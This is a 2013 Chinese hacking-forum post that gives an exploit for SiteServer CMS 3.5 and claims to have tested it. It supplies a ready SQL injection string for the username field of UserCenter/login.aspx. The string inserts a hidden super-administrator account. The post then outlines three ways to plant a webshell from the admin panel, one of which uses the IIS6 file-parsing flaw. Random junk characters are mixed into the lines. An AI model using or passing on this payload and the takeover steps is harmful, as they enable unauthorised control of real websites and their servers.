找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2893|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
, Y: V' g7 r" p# g7 v& h4 Z- {) @stieserver官网:www.siteserver.cn
. i- I2 N! \1 S* Q6 B  q: ~5 {EXP:
' {# t9 P6 W3 U: f! K直接访问UserCenter/login.aspx+ U0 N5 K1 k( ^$ O% o
用户名处输入:' o1 s& X4 |: O2 h

7 {4 ^1 v" \0 r123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
) Y) Z+ D* M. p2 f1 q( F密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
* ]) ?8 S$ @# a- l# g& M8 C) C( p之后再访问后台SiteServer/login.aspx用插入的用户登陆
( G% H: }" _6 X. \% t! P" J5 }5 V后台拿webshell的三种方法:7 N# y" R% \. L; l. I4 R
一、
0 {: P0 z% g6 j: \站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
) {& Q( C1 }! o; A4 k二、
$ j' E  {) E. I/ s( X* s5 i  z" H成员权限-》添加用户-》用户名为:1.asp! v7 k- ]; j% A3 x5 @( ^
http://127.0.0.1/usercenter/; i3 D. o6 v( E7 y
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell4 }% q. r1 f' R$ Y( @
(ps:后台添加用户时不会验证是否含有非法字符)
4 x  V/ F% J. v三、4 z7 u0 l; j; ~. U! {! A. D. O
系统工具-》实用工具-》机器参数查看
  z! g7 N2 a  S% u/ U) [! G1 H可以看到数据库类型、名称,WEB路径
! }2 M. S0 |. G8 j  h9 Q系统工具-》数据库工具-》SQL语句查询
. O; A) J5 [& Y: u$ {/ K3 Z; `这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表